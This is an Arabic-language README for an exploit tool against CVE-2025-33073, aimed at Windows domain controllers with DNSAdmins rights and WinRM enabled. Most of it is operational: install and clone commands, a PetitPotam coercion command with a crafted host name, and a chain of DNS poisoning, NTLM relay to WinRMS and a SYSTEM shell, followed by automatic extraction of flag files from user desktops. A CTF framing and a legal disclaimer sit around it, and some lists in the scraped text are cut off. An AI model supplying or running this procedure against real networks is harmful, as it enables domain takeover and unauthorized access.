
أداة استغلال شاملة لثغرة CVE-2025-33073 تستهدف وحدات تحكم المجال في Windows ذات صلاحيات DNSAdmins مع تمكين WinRM.

أداة استغلال شاملة لثغرة CVE-2025-33073 تستهدف وحدات تحكم المجال في Windows باستخدام صلاحيات DNSAdmins مع تمكين WinRM.
CVE-2025-33073 هي ثغرة حرجة تتيح للمهاجمين تحقيق تنفيذ كود بمستوى SYSTEM على وحدات تحكم المجال في Windows من خلال مزيج من:
يوفر هذا الـ PoC إطار استغلال عالميًا ومؤتمتًا متوافقًا مع أي نطاق، وأي اسم مستخدم، وأي بيئة CTF.
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
سيطلب السكربت ما يلي:
الطرفية 1 - تشغيل الاستغلال:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
الطرفية 2 - تنفيذ أمر الإكراه (انسخه من مخرجات الطرفية 1):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
النتيجة:
يبحث السكربت تلقائيًا ويستخرج:
*flag*.txt*root*.txt*user*.txtproof.txtالموقع: C:\Users\*\Desktop\
تُحفظ جميع المخرجات في: /0pwn_exploit_<TIMESTAMP>/
relay.log - مخرجات خادم ترحيل NTLMdns.log - سجلات عمليات DNSshell_output.log - أوامر القشرة والأعلام المستخرجة1. DNS Poisoning (krbrelayx.dnstool)
└─> Modify/Create DNS record pointing to attacker IP
2. NTLM Relay Server (ntlmrelayx.py)
└─> Listen for incoming NTLM authentication
3. Coercion (nxc + PetitPotam)
└─> Force DC to authenticate to attacker IP
4. Relay → WinRMS
└─> Relay authentication to target WinRMS
5. SYSTEM Shell
└─> Execute commands as SYSTEM
6. Auto Flag Extraction
└─> Search and extract all flags
عدّل متغير LONGHOST في exploit.sh:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
عدّل دالة run_shell_commands() للبحث عن أنماط ملفات مختلفة:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
تم توفير هذا الـ PoC من أجل:
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log بحثًا عن الأخطاءnc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()/0pwn_exploit_1234567890/
├── relay.log # NTLM relay server output
├── dns.log # DNS operation details
└── shell_output.log # Extracted flags & command output
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# Check DNS operations
cat /0pwn_exploit_*/dns.log
[العرض التوضيحي ولقطات الشاشة] - [قريبًا]

0pwn (uziii2208) - الفكرة الأصلية والبحث معزز بالذكاء الاصطناعي - تحسينات الإصدار 1.0 والاستخراج التلقائي للأعلام
رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل
إشعار قانوني:
تم توفير هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني ويعاقب عليه القانون.
باستخدامك لهذه الأداة، فإنك توافق على:
المساهمات مرحب بها! يرجى إرسال المشكلات (Issues) وطلبات السحب (Pull Requests).
للمشكلات أو الأسئلة أو التحسينات:
الحالة: ✅ تم الاختبار والتحقق الإصدار: 1.0 (شامل) آخر تحديث: 2025